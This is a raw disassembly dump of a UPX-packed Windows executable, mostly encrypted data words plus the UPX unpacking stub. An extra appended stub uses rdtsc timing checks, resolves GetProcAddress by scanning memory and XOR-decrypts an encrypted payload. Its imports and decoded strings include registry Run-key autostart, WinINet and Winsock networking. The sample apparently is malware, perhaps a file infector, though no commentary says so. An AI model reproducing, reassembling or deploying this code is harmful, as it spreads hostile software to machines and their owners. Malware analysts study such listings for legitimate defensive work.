dd 0E1FCB7FDh, 7FB7012Ch, 0F5CA21F7h, 0F25AFCFCh, 0FCF7EBFCh
dd 0D6ABAAF5h, 0BFEC34C7h, 0AAF9FFFCh, 2A25B459h, 0ACC9662Ah
dd 0B7819093h, 83639D90h, 9271CDC9h, 17DD8430h, 3519BFFEh
dd 95D91451h, 2A91720Ah, 68EBC871h, 0D21FFFFFh, 80D512A5h
dd 0AA529AE1h, 2A8D146Fh, 12B9C89Ah, 474A9A8Bh, 0DFDBFFFFh
dd 9BAB9EC3h, 20A319DBh, 0DDA26CECh, 9EED85BDh, 81E8A2DFh
dd 125544EBh, 0FFF9A1C8h, 961FBDB7h, 12EB8D2Eh, 5A9A85D8h
dd 9A099D12h, 96F8105Ah, 613FF76Dh, 664922D0h, 12FEFD7Fh
dd 0C25AA987h, 680C0295h, 1285EDDBh, 5A910482h, 7FCFF7CBh
dd 0FF372139h, 4D53FF85h, 53187242h, 0FCFEFFC8h, 62FE97FFh
dd 43500200h, 57544583h, 204B524Fh, 474F5250h, 204D4152h
dd 7DAC5231h, 4C17CD6Bh, 24D4E41h, 56EBAB0Ah, 15661D6Ah
dd 676B03B7h, 0D2DD6EBBh, 0E707576h, 27611A33h, 5832234Dh
dd 96C3E54Ch, 32323221h, 79D6312Eh, 18DA6B06h, 8B323C20h
dd 50BB73A4h, 2207192Bh, 5123FF0Ch, 7D8363h, 140A1104h
dd 0FD40520h, 0A0BB5BD1h, 4B4C0069h, 0B7505353h, 923DBF97h
dd 0E00882E0h, 2400574Ah, 64006Eh, 0EE6D8B6Fh, 73007502h
dd 130743Ah, 0D912DB09h, 398CDBh, 2E1D2335h, 0D913907h
dd 0ABDA0098h, 49922008h, 57DAE406h, 6760D89Fh, 0F2000370h
dd 7472346h, 3203C8DCh, 6000640h, 237F0110h, 151FFFFAh
dd 48E0888Ah, 44004F00h, 7A6A19FEh, 6F49E4F2h, 1CFFB022h
dd 2530AF28h, 53671074h, 0D7DF5CE1h, 7590A796h, 5C040030h
dd 0BAEEBD07h, 85A35D7h, 2E4D615Ch, 38003607h, 46C6EDB1h
dd 1B30772Eh, 43EC0049h, 336761CFh, 633F00E8h, 2DBFA264h
dd 0DC08201Fh, 0FF164004h, 0DEDE00h, 0E41EC242h, 9F16000Eh
dd 40260201h, 6137EFB8h, 11031928h, 97D96C8Bh, 7468D835h
dd 2A9B70D3h, 852DB69Ch, 9F256B7Ch, 0EB480E10h, 47B03BAh
dd 5413541Bh, 3F63265Ah, 59ADB9F7h, 0CBC75C22h, 5876545h
dd 907BD800h, 10030BE6h, 0B810B848h, 0FD8F0B0Eh, 6A05BFFFh
dd 0C391928h, 9B11D0B1h, 4FC000A8h, 5FF52ED9h, 0F68A885Dh
dd 0EBFC2FB2h, 9F11C91Ch, 102B3CE8h, 0CD16048h, 92BCA3F4h
dd 0A06045CFh, 470CA00Ch, 0B1879006h, 0CA0000Ch, 277FDF24h
dd 9004088h, 703EC00h, 8F60D900h, 401495F0h, 40707C4Fh
dd 1F0700BFh, 4314BD91h, 13857813h, 0F84F3C81h, 0A65BAB00h
dd 0F81013E9h, 0E31A8B2Fh
dd 0EFEFF39h, 4FBE4023h, 806183Ah, 0B9438884h, 7C9E4F10h
dd 1FFEEBAh, 200C10B8h, 3E420DADh, 7F0726CCh, 0E4AFD80Fh
dd 118BCB3h, 840F8470h, 0F200DF0Fh, 0F9521h, 0F0847F02h
dd 0F93C9B0h, 9A000F6Ch, 5BD911A8h, 13436F95h, 8127F958h
dd 586E691Fh, 72502050h, 0DB679000h, 1444614h, 906B3239h
dd 3C89F927h, 2751512h, 43005341h, 1C81AF64h, 7FEB0194h
dd 695FFF3h, 255C5CC6h, 70695C73h, 81662463h, 0FF071CECh
dd 2EA6A3E4h, 655300FFh, 75626544h, 85766967h, 0FD93A767h
dd 64411F46h, 5461756Ah, 6E656B6Fh, 93FB7317h, 6F4C36DCh
dd 56707512h, 65756C61h, 0B1A91741h, 704FB7EDh, 24636F28h
dd 43003473h, 1D4B062Ah, 333F6176h, 6CE0AFE3h, 6D4C7954h
dd 7F12BAF9h, 5F1565A3h, 79617254h, 430F3957h, 0A5B6A5B7h
dd 521E6135h, 54056F6Ch, 0AA546B68h, 56140C73h, 6D5CDF77h
dd 416D6EA6h, 78455328h, 8D6E3E7Bh, 35ACF4BEh, 22F3F54Bh
dd 50545448h, 0E25FBD83h, 32204012h, 4B4F205Bh, 6D010A0Dh
dd 4BEA56B7h, 2D0244A3h, 4B67044Ch, 315BECD9h, 7525203Ah
dd 56282F18h, 540F6B5Bh, 0A726B979h, 0AB518A70h, 8763D4CDh
dd 0D6062F15h, 0CBD53DCAh, 0CD72972Dh, 546B57A3h, 4473168h
dd 0FFFAF82Fh, 6468F74Ah, 8D73CFE9h, 6376736Dh, 68596A71h
dd 6977CFA9h, 0FBEC5DF5h, 5F32076Eh, 78EB7517h, 36380307h
dd 3734D34Dh, 33343536h, 3A69A569h, 307CBF7h, 20303132h
dd 39BB3B9Fh, 3D003833h, 0C833707h, 3536C832h, 320E3334h
dd 313220C8h, 0A56B7830h, 3AF7A426h, 0D8BBD9D0h, 533FFE5Eh
dd 5754464Fh, 5C455241h, 736F694Dh, 0D85CD76Fh, 0C3B07E1Ah
dd 7275435Ch, 0DC561572h, 885C573h, 525C0A6Fh, 239F6E75h
dd 0DA146F74h, 24D6A16Dh, 53203068h, 0ED87FB1Bh, 3FE728FFh
dd 64736E67h, 2B796A72h, 1980265h, 530064DCh, 155F0A51h
dd 0E4B619Ah, 664B4D6Ch, 0CD899087h, 0C549235Fh, 2F05538h
dd 0FF540A18h, 43205317h, 0DDA3EE5h, 76206762h, 58763FD5h
dd 6DECD96Ch, 23B53284h, 165B1B7Ch, 471A17B2h, 1F8D1723h
dd 931299BFh, 707379h, 0D62D6342h, 0C3208D1Ah, 1B132361h
dd 0ED6D80C0h, 9752206Dh, 443772DDh, 2D2DBB9Eh, 661220E4h
dd 0AC6D672Fh, 6C2FF62Ah, 632463C9h, 79746922h, 6E614D20h
dd 16C8051Eh, 31BC1AB9h, 146B0A8Ah, 0A24E2370h, 1BBC4ABh
dd 6488F6E8h, 6572463Fh, 0DF50C65h, 0FC01B8A5h, 4D746547h
dd 4665876Fh, 97F0066Bh, 6D614EE2h, 736C0168h, 95637274h
dd 0BBDEE05Bh, 706F430Ah, 9D0A1979h, 291F1445h, 326578DCh
dd 6F6F544Ah, 0FDA2936Ch, 337063BFh, 616E5332h, 6F687370h
dd 2B9C1974h, 126B7745h, 0F737232h, 3E358F54h, 2C5CC160h
dd 654E2118h, 87887478h, 6169C16Dh, 76455441h, 57FF6DBDh
dd 69616B0Bh, 726F4674h, 7B673C53h, 0B06A624Fh, 76AE8856h
dd 22DD442Ch, 6E6FEF8Dh, 0B6972F6h, 6573C83Ah, 646E6148h
dd 25EDB00Ch, 5E24477Bh, 6DD26E08h, 61EF7084h, 4493F05Ah
dd 6CEDB7A3h, 79645673h, 61984C14h, 866E492Bh, 66DD6ED8h
dd 9530F6Fh, 49067065h, 0E02CD998h, 656B260Dh, 0B3284564h
dd 36623364h, 0E0CC366Eh, 0B9FEC447h, 64410B12h, 70F7264h
dd 7DECD836h, 7262694Ch, 2BB56761h, 0B2C2824Dh, 137CB9A2h
dd 9ED08ED5h, 63CF02CDh, 0B6816954h, 88B6B0E2h, 4DDE6575h
dd 66CD78E9h, 0CE341245h, 0F684590Dh, 39C45D86h, 0ACD8624Fh
dd 455A843Ch, 0B8DF3178h, 0A4B6DB1h, 2D6D1363h, 85D91B52h
dd 7B5926E7h, 657A8608h, 38216D38h, 154CA7B0h, 0CDDFC45h
dd 60C368D8h, 673A2BD1h, 67E77390h, 79654BA1h, 0B0861045h
dd 0C13B0ED6h, 0F60A510Fh, 0B0109B11h, 0E7309E97h, 61DEDD21h
dd 51E01016h, 2962410Ch, 6EA1070Ah, 46853BEh, 8AF6612Dh
dd 773B8643h, 0B05F6D36h, 0A108946h, 8E611244h, 0E98AEEDh
dd 7966696Eh, 0DB8F67CAh, 75B586D0h, 0CE6C362Bh, 0DC2C796Fh
dd 11D85BD9h, 8F52106Fh, 8D40E3Dh, 1DB4CC0Eh, 148FE436h
dd 75716341h, 494D7269h, 2B9C1669h, 133AA035h, 0B473ECDEh
dd 7273F0CDh, 0B26D06CAh, 5AE60E35h, 0F92862Ch, 1D1D4D53h
dd 5F76856Eh, 5F3F5844h, 7311F668h, 27F502B1h, 982B0702h
dd 7279B6CDh, 110E94Fh, 334D2291h, 1D294562h, 0D8B6527h
dd 150E0073h, 41BB0A14h, 0B4E73098h, 73776649h, 856ED9A7h
dd 66B10570h, 24F44F41h, 18A0D0F6h, 55855604h, 5B01489Bh
dd 0E1141D8h, 0DC1A967h, 36B144Bh, 9963496Eh, 534386E1h
dd 471A8174h, 2543AA3Bh, 73FFA10Dh, 6CB2CB2Ch, 10D0202h
dd 2CB26F39h, 1734B2CBh, 9304090Ch, 13CB2CAAh, 0F9361610h
dd 50D16AADh, 45960E45h, 40DD34h, 3FED9A00h, 10F00E0h
dd 0C06010Bh, 83B11226h, 34DC472Ch, 31421023h, 0C966E90Bh
dd 74A02A8h, 0EC0D600Ch, 341E2DCCh, 58840710h, 570692CEh
dd 2B098C2Dh, 6420176Ch, 831E017Ch, 2E8C516Dh, 9024A26Ah
dd 60241F26h, 49FC460h, 0F6642EE0h, 0E11ED90Dh, 2A0714FBh
dd 0E850D227h, 48C01616h, 2F81h, 54C3F800h, 24000000h
dd 0FF0000h, 2 dup(0)
; ---------------------------------------------------------------------------
pusha
mov esi, offset dword_31426000
lea edi, [esi-5000h]
push edi
or ebp, 0FFFFFFFFh
jmp short loc_31427BD2
; ---------------------------------------------------------------------------
align 8
loc_31427BC8: ; CODE XREF: UPX1:loc_31427BD9�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
loc_31427BCE: ; CODE XREF: UPX1:31427C66�j
; UPX1:31427C7D�j
add ebx, ebx
jnz short loc_31427BD9
loc_31427BD2: ; CODE XREF: UPX1:31427BC0�j
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31427BD9: ; CODE XREF: UPX1:31427BD0�j
jb short loc_31427BC8
mov eax, 1
loc_31427BE0: ; CODE XREF: UPX1:31427BEF�j
; UPX1:31427BFA�j
add ebx, ebx
jnz short loc_31427BEB
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31427BEB: ; CODE XREF: UPX1:31427BE2�j
adc eax, eax
add ebx, ebx
jnb short loc_31427BE0
jnz short loc_31427BFC
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_31427BE0
loc_31427BFC: ; CODE XREF: UPX1:31427BF1�j
xor ecx, ecx
sub eax, 3
jb short loc_31427C10
shl eax, 8
mov al, [esi]
inc esi
xor eax, 0FFFFFFFFh
jz short loc_31427C82
mov ebp, eax
loc_31427C10: ; CODE XREF: UPX1:31427C01�j
add ebx, ebx
jnz short loc_31427C1B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31427C1B: ; CODE XREF: UPX1:31427C12�j
adc ecx, ecx
add ebx, ebx
jnz short loc_31427C28
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31427C28: ; CODE XREF: UPX1:31427C1F�j
adc ecx, ecx
jnz short loc_31427C4C
inc ecx
loc_31427C2D: ; CODE XREF: UPX1:31427C3C�j
; UPX1:31427C47�j
add ebx, ebx
jnz short loc_31427C38
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31427C38: ; CODE XREF: UPX1:31427C2F�j
adc ecx, ecx
add ebx, ebx
jnb short loc_31427C2D
jnz short loc_31427C49
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_31427C2D
loc_31427C49: ; CODE XREF: UPX1:31427C3E�j
add ecx, 2
loc_31427C4C: ; CODE XREF: UPX1:31427C2A�j
cmp ebp, 0FFFFF300h
adc ecx, 1
lea edx, [edi+ebp]
cmp ebp, 0FFFFFFFCh
jbe short loc_31427C6C
loc_31427C5D: ; CODE XREF: UPX1:31427C64�j
mov al, [edx]
inc edx
mov [edi], al
inc edi
dec ecx
jnz short loc_31427C5D
jmp loc_31427BCE
; ---------------------------------------------------------------------------
align 4
loc_31427C6C: ; CODE XREF: UPX1:31427C5B�j
; UPX1:31427C79�j
mov eax, [edx]
add edx, 4
mov [edi], eax
add edi, 4
sub ecx, 4
ja short loc_31427C6C
add edi, ecx
jmp loc_31427BCE
; ---------------------------------------------------------------------------
loc_31427C82: ; CODE XREF: UPX1:31427C0C�j
pop esi
mov edi, esi
mov ecx, 7Eh
loc_31427C8A: ; CODE XREF: UPX1:31427C91�j
; UPX1:31427C96�j
mov al, [edi]
inc edi
sub al, 0E8h
loc_31427C8F: ; CODE XREF: UPX1:31427CB4�j
cmp al, 1
ja short loc_31427C8A
cmp byte ptr [edi], 1
jnz short loc_31427C8A
mov eax, [edi]
mov bl, [edi+4]
shr ax, 8
rol eax, 10h
xchg al, ah
sub eax, edi
sub bl, 0E8h
add eax, esi
mov [edi], eax
add edi, 5
mov eax, ebx
loop loc_31427C8F
lea edi, [esi+5000h]
loc_31427CBC: ; CODE XREF: UPX1:31427CDE�j
mov eax, [edi]
or eax, eax
jz short loc_31427D07
mov ebx, [edi+4]
lea eax, [eax+esi+7000h]
add ebx, esi
push eax
add edi, 8
call dword ptr [esi+708Ch]
xchg eax, ebp
loc_31427CD9: ; CODE XREF: UPX1:31427CFF�j
mov al, [edi]
inc edi
or al, al
jz short loc_31427CBC
mov ecx, edi
jns short near ptr loc_31427CEA+1
movzx eax, word ptr [edi]
inc edi
push eax
inc edi
loc_31427CEA: ; CODE XREF: UPX1:31427CE2�j
mov ecx, 0AEF24857h
push ebp
call dword ptr [esi+7090h]
or eax, eax
jz short loc_31427D01
mov [ebx], eax
add ebx, 4
jmp short loc_31427CD9
; ---------------------------------------------------------------------------
loc_31427D01: ; CODE XREF: UPX1:31427CF8�j
call dword ptr [esi+7094h]
loc_31427D07: ; CODE XREF: UPX1:31427CC0�j
popa
jmp loc_31422334
; ---------------------------------------------------------------------------
align 400h
UPX1 ends
; Section 3. (virtual address 00008000)
; Virtual size : 00011000 ( 69632.)
; Section size in file : 00011000 ( 69632.)
; Offset to raw data for section: 00008000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX2 segment para public 'CODE' use32
assume cs:UPX2
;org 31428000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dd 3 dup(0)
dd 80C4h, 808Ch, 3 dup(0)
dd 80D1h, 809Ch, 3 dup(0)
dd 80DEh, 80A4h, 3 dup(0)
dd 80E9h, 80ACh, 3 dup(0)
dd 80F4h, 80B4h, 3 dup(0)
dd 8100h, 80BCh, 5 dup(0)
dd 7C801D77h, 7C80ADA0h, 7C81CDDAh, 0
dd 77DD6BF0h, 0
dd 77C371D3h, 0
dd 7E41A8ADh, 0
dd 42C2C8A1h, 0
dd 71AB9639h, 0
dd 4E52454Bh, 32334C45h, 4C4C442Eh, 56444100h, 33495041h
dd 6C642E32h, 534D006Ch, 54524356h, 6C6C642Eh, 45535500h
dd 2E323352h, 6C6C64h, 494E4957h, 2E54454Eh, 6C6C64h, 5F325357h
dd 642E3233h, 6C6Ch, 64616F4Ch, 7262694Ch, 41797261h, 65470000h
dd 6F725074h, 64644163h, 73736572h, 78450000h, 72507469h
dd 7365636Fh, 73h, 43676552h, 65736F6Ch, 79654Bh, 61720000h
dd 646Eh, 72707377h, 66746E69h, 41h, 65746E49h, 74656E72h
dd 6E65704Fh, 41h, 26h dup(0)
dd 0C3906893h, 0C48BED01h, 0E85BD0FFh, 5Fh, 824648Bh, 4EBB8h
dd 64FAEB00h, 18A167h, 0F30408Bh, 830240B6h, 427500F8h
dd 0E8h, 0ED815D00h, 402338h, 2385858Bh, 85030040h, 40238Dh
dd 858BF08Bh, 402389h, 238D8503h, 60500040h, 0C933FE8Bh
dd 2395958Ah, 32AC0040h, 0AAD002C2h, 918D3B41h, 7C004023h
dd 2BC361F1h, 30FF64C0h, 0B8208964h, 12345678h, 60000387h
dd 7BB00000h, 0
dd 1E003142h, 100000h, 75Ch dup(0)
; ---------------------------------------------------------------------------
call $+5
mov eax, [esp]
cld
mov [eax+32C7h], ebx
mov ecx, [eax+297Fh]
mov ebx, [esp+4]
and ecx, 10000000h
jz short loc_3142A04C
pop ecx
mov [eax+32CBh], esi
mov cl, [eax+2983h]
mov [eax+32CFh], edi
cmp cl, 0E8h
jz short loc_3142A041
mov ebx, [eax+2985h]
jmp short loc_3142A04A
; ---------------------------------------------------------------------------
loc_3142A041: ; CODE XREF: UPX2:3142A037�j
add ebx, [eax+2984h]
mov ebx, [ebx+2]
loc_3142A04A: ; CODE XREF: UPX2:3142A03F�j
mov ebx, [ebx]
loc_3142A04C: ; CODE XREF: UPX2:3142A01F�j
push ebp
mov ebp, eax
sub dword ptr [esp+4], 1E05h
sub ebp, 101005h
mov edi, [esp+4]
lea esi, [ebp+103990h]
mov ecx, 0DEh
rep movsb
call sub_3142A125
mov ecx, eax
call sub_3142A125
sub eax, ecx
jz short loc_3142A0F7
cmp eax, 100h
ja short loc_3142A0F7
and ebx, 0FFFFF000h
loc_3142A08B: ; CODE XREF: UPX2:3142A09A�j
cmp dword ptr [ebx+4Eh], 73696854h
jz short loc_3142A09C
loc_3142A094: ; CODE XREF: UPX2:3142A0A9�j
sub ebx, 100h
jnz short loc_3142A08B
loc_3142A09C: ; CODE XREF: UPX2:3142A092�j
mov eax, ebx
add eax, [ebx+3Ch]
mov edx, [eax+78h]
cmp word ptr [eax], 4550h
jnz short loc_3142A094
add edx, ebx
mov esi, [edx+20h]
mov ecx, [edx+18h]
add esi, ebx
push ecx
loc_3142A0B6: ; CODE XREF: UPX2:loc_3142A0CA�j
lodsd
add eax, ebx
cmp word ptr [eax+2], 5074h
jnz short loc_3142A0CA
cmp dword ptr [eax+5], 6441636Fh
jz short loc_3142A0CF
loc_3142A0CA: ; CODE XREF: UPX2:3142A0BF�j
loop loc_3142A0B6
pop ecx
jmp short loc_3142A0F7
; ---------------------------------------------------------------------------
loc_3142A0CF: ; CODE XREF: UPX2:3142A0C8�j
sub [esp], ecx
mov esi, [edx+24h]
pop ecx
add esi, ebx
movzx eax, word ptr [esi+ecx*2]
mov edi, [edx+1Ch]
add edi, ebx
mov esi, [edi+eax*4]
add esi, ebx
lea eax, [ebp+10113Fh]
mov dx, [eax-17h]
call sub_3142A12A
jmp short loc_3142A13F
; ---------------------------------------------------------------------------
loc_3142A0F7: ; CODE XREF: UPX2:3142A07C�j
; UPX2:3142A083�j ...
mov eax, [ebp+103984h]
and eax, 10000000h
jz short loc_3142A123
mov edi, [esp+4]
lea esi, [ebp+103988h]
lodsd
mov ebx, [ebp+1042CCh]
stosd
movsb
mov edi, [ebp+1042D4h]
mov esi, [ebp+1042D0h]
loc_3142A123: ; CODE XREF: UPX2:3142A102�j
pop ebp
retn
; =============== S U B R O U T I N E =======================================
sub_3142A125 proc near ; CODE XREF: UPX2:3142A06E�p
; UPX2:3142A075�p
rdtsc
retn
sub_3142A125 endp
; ---------------------------------------------------------------------------
db 13h, 5Ah
; =============== S U B R O U T I N E =======================================
sub_3142A12A proc near ; CODE XREF: UPX2:3142A0F0�p
push ebx
mov ecx, 2845h
mov ebx, edx
loc_3142A132: ; CODE XREF: sub_3142A12A+11�j
xor [eax], dl
sub dl, bl
xchg bl, bh
inc eax
xchg dl, dh
loop loc_3142A132
pop ebx
retn
sub_3142A12A endp
; ---------------------------------------------------------------------------
loc_3142A13F: ; CODE XREF: UPX2:3142A0F5�j
sti
push esi
; ---------------------------------------------------------------------------
db 2 dup(0), 0EDh
dd 0B423B6E5h, 0CFF9FC97h, 7B81E25Ah, 0DCE697D9h, 3F426453h
dd 9C5F422h, 9157F66Eh, 0D814B1DFh, 0F9C9DC43h, 22F8C526h
dd 0CECD8861h, 258006C0h, 0FFDC1FDEh, 0AD4DAB82h, 0C707A782h
dd 0E2B2D25Fh, 985F7A14h, 6FDDDD64h, 0F3A43EC0h, 0F5F00B89h
dd 4B332213h, 567743B9h, 0AD41697Eh, 0D8206044h, 0B6E94506h
dd 91B82411h, 0FB11C9E3h, 0D125D9AAh, 0DD500709h, 0F4168C52h
dd 532473B9h, 3810C555h, 271A36h, 0F48851F1h, 3864CEAEh
dd 85A528AFh, 0CA7F8256h, 49584926h, 0AB31B5EEh, 0FDE0002Fh
dd 0BA92CD1h, 0B078D4C0h, 0B5F62B97h, 0D09D787Ah, 3F4C474Ah
dd 0A425E531h, 0F3E43870h, 40A8C02Bh, 0F88CBAE5h, 0BFA601CDh
dd 0B3E56E6Eh, 0E1F447D5h, 84BC2216h, 0A962E825h, 0C33C15ADh
dd 14A8B0EAh, 67D2BCC3h, 23D40C92h, 2BEE3EDEh, 3B668DD5h
dd 1F99F266h, 0BB8648CDh, 1E23A60Eh, 7D1080EFh, 0FEA3D1A6h
dd 21983849h, 0EBE4E3BFh, 40BDE89Ah, 0AF6CD08Ah, 6B3739D1h
dd 0E8349AEDh, 0E683A46h, 822173C6h, 0F1E81F17h, 37CF756Dh
dd 5B80EF63h, 178B8E71h, 59296C81h, 0D42D331h, 0C943200Ah
dd 0E8CC7F46h, 0C15A4B36h, 9BCE39FEh, 75988920h, 27BC6292h
dd 29893CE2h, 3DE283D1h, 1DA5F06Ah, 0B5EE4EC9h, 91D2A412h
dd 6B04160Eh, 453A58AEh, 4890DA37h, 91B80D28h, 0D335E68Fh
dd 93B65525h, 8DA49A36h, 9E187572h, 2B5A782Bh, 15B5C00Ah
dd 0BE150256h, 0A348DCA0h, 0A977EFEEh, 0E81F9A50h, 573C542Ch
dd 0B2BBB539h, 1BFA48A3h, 611FF86Ah, 0BF5CD082h, 99A8AAEAh
dd 37A0C84Eh, 0B2402CD6h, 37B24873h, 0D76D9932h, 0E824FE69h
dd 0BCD4503h, 3EBCB228h, 1CE0EF6Ch, 0C05456ACh, 0D9EC247h
dd 73E30A46h, 0D138E692h, 95463B55h, 0F52F983Ah, 8499FD77h
dd 0B2685CFAh, 38AFC8Bh, 0EC70FF5Ah, 0FE645F29h, 2413B4E2h
dd 7BF4B0F8h, 0DA311875h, 3F456D53h, 0C3459722h, 14E650h
dd 0BC112FA0h, 0AE902F89h, 0FC738442h, 4B54604Ch, 546F3109h
dd 0B6599D37h, 3128FCBBh, 0B374C776h, 0B2881D97h, 0A8877A76h
dd 98AE54D8h, 98A05E01h, 0B59A0BABh, 0A56B1B95h, 2490D6E2h
dd 93C1759Bh, 5D39C97Ah, 33E14AC6h, 0EE47DA5Fh, 66AF98A1h
dd 0C55095AEh, 34FAB2F6h, 0D2ECCBCFh, 0C6B982BCh, 2D907D2Eh
dd 5457C8Ah, 239B5F14h, 30912CBCh, 0FDB0C2DEh, 6FFCF0BAh
dd 49229029h, 23FEF265h, 0FDE01052h, 866C808Eh, 0E176AE80h
dd 0B50A0BE1h, 0E648787Ah, 0D3341272h, 92A82C70h, 78F46C9Ah
dd 0A7008A56h, 0F58ED0E6h, 6DB09458h, 31246E0Ch, 0CA1A19CAh
dd 0D929DD46h, 0B608EC5Ch, 0CCAB53F7h, 9DA1B77Eh, 77590746h
dd 0E8387482h, 2B843265h, 0A023F7A1h, 0CF1C1FF7h, 3CE5CCD2h
dd 93A4B24Ch, 395060A5h, 0B8267ACCh, 1F46A10Dh, 3B610E2Eh
dd 3D049DD5h, 0AF7CC399h, 89C88DCAh, 2771256Eh, 5A1532DFh
dd 61C55856h, 969D683Bh, 2313DEFBh, 0A590BDBAh, 3D9027C9h
dd 0CCD76C92h, 336478ACh, 2B55DF4Dh, 8D0CEA58h, 3E5ABEB2h
dd 8B9AF86Bh, 74D8314Ah, 64AB6296h, 0D84B503h, 962B417Ah
dd 0DD30CEE0h, 12EF3CF5h, 91A89B24h, 94532A5Eh, 556EC63Fh
dd 6B5CB7F6h, 76B4A24h, 2CDA948Ah, 0C788E4AEh, 78E6F026h
dd 7126E2E7h, 4FA4CBBEh, 9D58BBD6h, 0DCFC0253h, 0F3AB4D6Bh
dd 9CA233D7h, 4F95902Ah, 73081607h, 420A37B1h, 0CA45366Ah
dd 0E510F6CDh, 0E90C86E6h, 0CAF8FC53h, 4DBA13B1h, 8DC5608Ah
dd 0D8834EBFh, 8ED03046h, 0CB1BD8FBh, 48B520CAh, 70EF5DE9h
dd 79365AF7h, 0C2DABDAEh, 1DA1183Eh, 62135D46h, 0D128DAB4h
dd 95A22B21h, 4539983Ah, 5FE38D8Dh, 53682698h, 79B44C0Eh
dd 0ED01685Ah, 3C7DAA2h, 0CBC8B498h, 84200532h, 0A483E68h
dd 1C7C42E2h, 0F612F4EBh, 76990991h, 0BD70C5EBh, 0C7FDFB54h
dd 4FD211ADh, 8FC75E8Eh, 0DA1BFBCAh, 0FF844A6Eh, 0D928DE6Eh
dd 0B374C8A5h, 8DC0A01Bh, 670C7A66h, 415854B2h, 1BA4077Ah
dd 0F5F0084Ah, 306FB4C7h, 0B9B68E77h, 2F8D3D2Eh, 0A655B0FEh
dd 0BAAFA424h, 1A15987h, 7EFBAC5Eh, 0C540E620h, 0DDD0377Fh
dd 6F008C52h, 1F34668Eh, 58EB2FB5h, 6EBE4A56h, 84749D04h
dd 0DA32ABD9h, 0D4D5DD66h, 0FA03D256h, 49586290h, 61C4B367h
dd 0A123102Ah, 0B25F8BC4h, 0D415A59Ch, 0E1A6D17Ah, 16641B0Fh
dd 6C2804EAh, 19DC4F67h, 81807522h, 0CD2E85F6h, 0C6E9C8A5h
dd 0E89EF146h, 5B650B12h, 54153A89h, 66FA4762h, 8845990Eh
dd 0AD3DA6DEh, 0DEA0F19Dh, 38DEF34h, 3E4A34F7h, 58F75BBDh
dd 7793186Bh, 0BA689313h, 0D605A990h, 0FBE0C37Ah, 961E528h
dd 223E19A6h, 75FD4093h, 9A817C56h, 0A773E8EEh, 0CA08A3B3h
dd 0E5A7F376h, 13781306h, 53336289h, 7FDF5A67h, 0B4F8703Dh
dd 9F30B7E6h, 0C4F5CA82h, 169A9252h, 307C09EEh, 5C2023A3h
dd 79B35949h, 8E589703h, 8758B1DFh, 0D7C1CB8Ch, 1482EA23h
dd 83C1BE4h, 40CE4887h, 77957342h, 0BF49820Eh, 0C409BEB3h
dd 0F4FFA453h, 76D382Ah, 3F390BCFh, 7ADB3293h, 95814A36h
dd 0BE5DB2EBh, 0C8C7C0BFh, 0E3A3D752h, 297D1807h, 570020DFh
dd 52B0696Fh, 8AA87633h, 0A00EACCFh, 0C2DAD382h, 7DA1F557h
dd 3580FC1h, 610829B7h, 4AAC6A7Fh, 9175BF6Ah, 0CC2EB7E0h
dd 99C6C36Bh, 2580E309h, 243312FFh, 5FC95489h, 649F1473h
dd 0B74BB80Ah, 0FC15A5BFh, 0FDD3C478h, 7C1D0Fh, 431538C1h
dd 79C15FB6h, 858E630Ah, 904196F3h, 0DBE5F3DEh, 0F2B5F17Ch
dd 365A1439h, 766829AEh, 55DA437Eh, 0A0656C33h, 0AE3CAAC7h
dd 0A1D9D39Ch, 1581FE71h, 365F1ADAh, 2F0F31B3h, 6AA76E72h
dd 0D067850Bh, 0CF099688h, 0C7ACDE75h, 149BEB20h, 79772DEDh
dd 51E85DA4h, 8BB94136h, 0BC4485C4h, 0C100B28Fh, 0F9B5C273h
dd 674D0903h, 72C31E1h, 4FC14297h, 0F5956523h, 0AA598EC5h
dd 0D0DBBC92h, 0EEB1E25Dh, 384D192Eh, 5E2A2592h, 78EC417Eh
dd 0BE049B33h, 0B531B5C4h, 0E8F9DBA0h, 10AEEA0Dh, 53403E2h
dd 58F432B3h, 6B8D7647h, 0E17B9B1Eh, 0CF0DBCE9h, 0F9D9EE6Fh
dd 1BB28233h, 3C2238E3h, 51C4429Dh, 91896653h, 0A4498DE3h
dd 0D413AB86h, 0FF8A9E70h, 4750A29h, 561A37C2h, 57A8496Eh
dd 9686453Ah, 9D2594FBh, 0C2EFD594h, 0CFD8E741h, 3E562D0Ah
dd 65153CABh, 6ADF4D64h, 914D8F11h, 802098AEh, 0E9C1D588h
dd 1489D923h, 3F570DE6h, 68F070DEh, 71B17D58h, 0BA6FA713h
dd 0D61A9CB0h, 0E0C7C36Dh, 2074CE5Ah, 2E1A2AC7h, 47D74397h
dd 8F876B6Dh, 0D55E87E3h, 0DF33B698h, 0E08EF247h, 2D141302h
dd 58101FCEh, 78DE7A68h, 828B6131h, 0AE2FB1CAh, 0D1DEB884h
dd 11B9E279h, 2D4B09D1h, 331A29A7h, 7F905454h, 84698E09h
dd 0B33182C6h, 0F7C5DB8Ah, 1A9DED07h, 13C1BE4h, 4CFD6D96h
dd 6D9D6F5Ch, 0B0529F1Ch, 0D805BEA7h, 0FAD7F07Ch, 2504103Bh
dd 2C220FDEh, 76CA5782h, 989D7830h, 0BE51ABE2h, 0ADF9B2B5h
dd 0D2A0EE74h, 0E7B1D1Ch, 4F372BDAh, 72DE4178h, 81BD6D02h
dd 0BD1BB5D1h, 0C4FADF9Ch, 3CB3C73Ah, 254D1ED5h, 310831A6h
dd 78AB727Dh, 867F8B0Fh, 0BF28B7DDh, 0F7C6C361h, 7380E52Bh
dd 253405FDh, 45F84989h, 6CB97A4Bh, 0BE56EE1Bh, 0C670BEA9h
dd 8FD8CC73h, 26B1311h, 0A5422CBh, 6FC54494h, 0B4986F28h
dd 0B44B8BFEh, 0CFEADF96h, 0CCD0FD46h, 2D790618h, 7E1C29ACh
dd 7CF7526Bh, 8E656E34h
